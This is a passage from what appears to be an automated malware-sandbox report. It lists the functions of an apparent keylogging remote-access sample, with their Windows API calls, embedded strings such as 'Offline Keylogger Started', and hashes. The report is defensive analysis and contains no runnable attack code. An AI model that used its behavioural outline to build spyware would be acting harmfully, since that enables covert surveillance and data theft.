                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334ED1
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334ED6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2403171778-0
                                                                                                                                                                                          • Opcode ID: 71423de7ca9d65e8dae80ce09b1e3cfa118d501f7f289f97c53619bef4bf05c8
                                                                                                                                                                                          • Instruction ID: d030f1907288df46b24f68c69d121462099f90e9690cd3e0d8a8742135c6aa6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71423de7ca9d65e8dae80ce09b1e3cfa118d501f7f289f97c53619bef4bf05c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9211832050B149FDB326B26CC48B17BBE5FF40726F104B19E2E615AF0CB62B811DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12342AB4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1101 12342ab4-12342afd GetModuleFileNameW call 123320df * 3 1108 12342aff-12342b89 call 1234b978 call 12331fab call 1233d9e8 call 12331fd8 call 1234b978 call 12331fab call 1233d9e8 call 12331fd8 call 1234b978 call 12331fab call 1233d9e8 call 12331fd8 1101->1108 1133 12342b8b-12342c1b call 12331fab call 1233417e call 123342fc call 1233431d call 12333014 call 12331f04 call 12348568 call 12331f09 * 4 1108->1133 1156 12342c1d-12342c25 Sleep 1133->1156 1157 12342c2b 1133->1157 1156->1133 1156->1157 1158 12342c2d-12342cbd call 12331fab call 1233417e call 123342fc call 1233431d call 12333014 call 12331f04 call 12348568 call 12331f09 * 4 1157->1158 1181 12342ccd 1158->1181 1182 12342cbf-12342cc7 Sleep 1158->1182 1183 12342ccf-12342d5f call 12331fab call 1233417e call 123342fc call 1233431d call 12333014 call 12331f04 call 12348568 call 12331f09 * 4 1181->1183 1182->1158 1182->1181 1206 12342d61-12342d69 Sleep 1183->1206 1207 12342d6f-12342d94 1183->1207 1206->1183 1206->1207 1208 12342d98-12342db4 call 12331f04 call 1234c485 1207->1208 1213 12342db6-12342dc5 call 12331f04 DeleteFileW 1208->1213 1214 12342dcb-12342de7 call 12331f04 call 1234c485 1208->1214 1213->1214 1221 12342e04 1214->1221 1222 12342de9-12342e02 call 12331f04 DeleteFileW 1214->1222 1224 12342e08-12342e24 call 12331f04 call 1234c485 1221->1224 1222->1224 1230 12342e26-12342e38 call 12331f04 DeleteFileW 1224->1230 1231 12342e3e-12342e40 1224->1231 1230->1231 1233 12342e42-12342e44 1231->1233 1234 12342e4d-12342e58 Sleep 1231->1234 1233->1234 1235 12342e46-12342e4b 1233->1235 1234->1208 1236 12342e5e-12342e70 call 12336b28 1234->1236 1235->1234 1235->1236 1240 12342ec6-12342ee5 call 12331f09 * 3 1236->1240 1241 12342e72-12342e80 call 12336b28 1236->1241 1252 12342eea-12342f4e call 1233b904 call 12331f04 call 123320f6 call 1234322d call 12331f09 call 12335b05 1240->1252 1241->1240 1247 12342e82-12342e90 call 12336b28 1241->1247 1247->1240 1253 12342e92-12342ebe Sleep call 12331f09 * 3 1247->1253 1273 12342f54-123430a3 call 1234bd1e call 1234bb8e call 12332f31 call 12332f10 * 6 call 12332ea1 call 12332f10 call 12332ea1 call 12334aa1 call 12331fd8 * 10 1252->1273 1274 123430a8-12343151 call 1234bd1e call 12332f31 call 12332f10 * 6 call 12332ea1 call 12334aa1 1252->1274 1253->1108 1267 12342ec4 1253->1267 1267->1252 1344 123431a5-1234322c call 12331fd8 call 12331f09 call 12331fd8 * 9 1273->1344 1313 12343156-123431a1 call 12331fd8 * 7 1274->1313 1313->1344
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 12342ACD
                                                                                                                                                                                            • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(123340F5,?,?,123340F5,12395E74), ref: 1234857E
                                                                                                                                                                                            • Part of subcall function 12348568: CloseHandle.KERNEL32(12395E74,?,?,123340F5,12395E74), ref: 12348587
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74), ref: 12342C1F
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74,12395E74), ref: 12342CC1
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,12395E74,12395E74,12395E74), ref: 12342D63
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342DC5
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342DFC
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,12395E74,12395E74,12395E74), ref: 12342E38
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,12395E74,12395E74,12395E74), ref: 12342E52
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 12342E94
                                                                                                                                                                                            • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                          • String ID: /stext "
                                                                                                                                                                                          • API String ID: 1223786279-3856184850
                                                                                                                                                                                          • Opcode ID: 33fc395927d7b7765498312fb1a5459d5a4c0cf58126db77fa67301c76948b69
                                                                                                                                                                                          • Instruction ID: 95d19d956e4d6d91d0803fc14838d6b0fb97c4d00bbc69c54ca9b7c1a931987f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fc395927d7b7765498312fb1a5459d5a4c0cf58126db77fa67301c76948b69
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA02023A5083818BC3BADB61D890AFFB3E5AF94301F50495DD48A971A4EF347B4AC752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 1233AD38
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1233AD43
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 1233AD49
                                                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 1233AD52
                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 1233AD86
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1233AE54
                                                                                                                                                                                            • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                          • API String ID: 911427763-3954389425
                                                                                                                                                                                          • Opcode ID: 55813ac9ab0fcfd64e5c0a1c70216d2f10e93de2bcccfb60af696134269ce38b
                                                                                                                                                                                          • Instruction ID: fbe22665588c09f28317821c47f827504adc88afa5a837aed5a8729b1d7a8b27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55813ac9ab0fcfd64e5c0a1c70216d2f10e93de2bcccfb60af696134269ce38b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F51C877A043415FC766D730C894ABE77EAAF84712F400A29E496C62D4EF34EB45CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 1233DB9A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongNamePath
                                                                                                                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                          • API String ID: 82841172-425784914
                                                                                                                                                                                          • Opcode ID: b5afad6cede5f5ca6f4a2708436f9422b1f84038caf4aa40d1221f8534c628a1
                                                                                                                                                                                          • Instruction ID: 2a5418260f76a4a4086be765c76efce63220d4f34903a1237a08d8776628ea59
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5afad6cede5f5ca6f4a2708436f9422b1f84038caf4aa40d1221f8534c628a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0841217B4183049AD66ADB60DD54CFEB7B8AE91352F10462EF485D2190FF20BF49CA52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1234BFB7: GetCurrentProcess.KERNEL32(?,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFC8
                                                                                                                                                                                            • Part of subcall function 1234BFB7: IsWow64Process.KERNEL32(00000000,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFCF
                                                                                                                                                                                            • Part of subcall function 123435A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 123435CA
                                                                                                                                                                                            • Part of subcall function 123435A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 123435E7
                                                                                                                                                                                            • Part of subcall function 123435A6: RegCloseKey.KERNEL32(?), ref: 123435F2
                                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000,1239C9F8,00000000,00000000,00000000,123A50E4,00000003,Exe,00000000,0000000E,00000000,123960BC,00000003,00000000), ref: 1234B33C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                          • API String ID: 782494840-2070987746
                                                                                                                                                                                          • Opcode ID: e57045c1431e235873436e7addf7125a8010e283022439724f39c92ab156a074
                                                                                                                                                                                          • Instruction ID: 76abe126e73331d3f4d41a46c505921bbf84db76b8aa9c8176226fa637d69988
                                                                                                                                                                                          • Opcode Fuzzy Hash: e57045c1431e235873436e7addf7125a8010e283022439724f39c92ab156a074
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72115977D402841AEB65A3748C95EBE7BAD8B95310FA04664E546E31D1FE10AD02C7A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 1233A740
                                                                                                                                                                                            • Part of subcall function 1233A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1233A74D), ref: 1233A6AB
                                                                                                                                                                                            • Part of subcall function 1233A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,1233A74D), ref: 1233A6BA
                                                                                                                                                                                            • Part of subcall function 1233A675: Sleep.KERNEL32(00002710,?,?,?,1233A74D), ref: 1233A6E7
                                                                                                                                                                                            • Part of subcall function 1233A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,1233A74D), ref: 1233A6EE
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1233A77C
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 1233A78D
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1233A7A4
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 1233A81E
                                                                                                                                                                                            • Part of subcall function 1234C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,12396468,?,00000000,00000000,00000000,00000000,00000000), ref: 1233A927
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 110482706-0
                                                                                                                                                                                          • Opcode ID: b9f4c87f9667a041603b3e1d5677cd9273b81eca30ce593a6668a9902283f816
                                                                                                                                                                                          • Instruction ID: 8c91335f8b69181bb213371e77e7bb55e2117847e2a2562181d45c08af6c9d57
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f4c87f9667a041603b3e1d5677cd9273b81eca30ce593a6668a9902283f816
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51617B6043045FCBA7EB70C864ABE77A95F81316F404A1DE492972D0DF25AB0AC752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1464C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(1464C7DD), ref: 1464C7E6
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
                                                                                                                                                                                            • Part of subcall function 1464C803: GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
                                                                                                                                                                                            • Part of subcall function 1464C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
                                                                                                                                                                                            • Part of subcall function 1464C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction ID: c5203219aca41bac0974659d549ffa4e6adbe310fc6c9950573c30589d04d48c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00012E10A466417CBF1292740C00ABA6FD89B3367CB3F1B96E2009639BD9A08102C3AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1464C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
                                                                                                                                                                                            • Part of subcall function 1464C7E6: GetModuleHandleA.KERNEL32(1464C7DD), ref: 1464C7E6
                                                                                                                                                                                            • Part of subcall function 1464C7E6: GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
                                                                                                                                                                                            • Part of subcall function 1464C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
                                                                                                                                                                                            • Part of subcall function 1464C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction ID: e544fa5d7c7215c7bca5cabc66d442ea05864200187e4b0b522e972b9f3213b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 052138215096826FFF128B744C007A67FD89B33278F3F0696D140CB387D5A89445C3A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,1234C510,00000000,00000000,?), ref: 1234C430
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,1233A8E7,?,00000000,00000000), ref: 1234C44D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C459
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C46A
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,1233A8E7,?,00000000,00000000), ref: 1234C477
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1087594267-0
                                                                                                                                                                                          • Opcode ID: 971053353e25b6904670b38f375eb60e243dc577aaa617686b3997ad261a9cc0
                                                                                                                                                                                          • Instruction ID: 4f4be6a61cc221a60879e5af517593502eae7285e52f4a7b589323a744d1cec1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 971053353e25b6904670b38f375eb60e243dc577aaa617686b3997ad261a9cc0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D711E1B23452A17FE6024A249D8DEBB73DCEB82274FA04F69F191C63C1CA618C008731
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1464C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,1464C7F4), ref: 1464C804
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C816
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1464C7F4,1464C7DD), ref: 1464C82A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1464C7DD), ref: 1464C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1464C860
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction ID: fab74682b50edfebb43a34ee3ff2b4fa14cb83d913b35c5c14fa00b6a3031982
                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF0F6516466417CFF1246B40C41EF65FCC8B37678B3E1A56E200C738BD895850683FA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,1233A27D,?,00000000,00000000), ref: 1233A1FE
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,1233A267,?,00000000,00000000), ref: 1233A20E
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,1233A289,?,00000000,00000000), ref: 1233A21A
                                                                                                                                                                                            • Part of subcall function 1233B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
                                                                                                                                                                                            • Part of subcall function 1233B164: wsprintfW.USER32 ref: 1233B1F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                          • String ID: Offline Keylogger Started
                                                                                                                                                                                          • API String ID: 465354869-4114347211
                                                                                                                                                                                          • Opcode ID: 29a63aabea44032cd08a569a44d33f43cba53c739f154cbf2edc129cee10dd39
                                                                                                                                                                                          • Instruction ID: b59b18fdb3046b08177b5ae6337551e43faf632701e11fcb60f1a7b73eb48763
                                                                                                                                                                                          • Opcode Fuzzy Hash: 29a63aabea44032cd08a569a44d33f43cba53c739f154cbf2edc129cee10dd39
                                                                                                                                                                                          • Instruction Fuzzy Hash: B811CABB5002087EE275B7369C85CBF776DDA8129AB50061DF84642155EE216F09CAF2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(00000001,123A4EE0,123A5598,?,?,?,?,12345CD6,?,00000001), ref: 12334F81
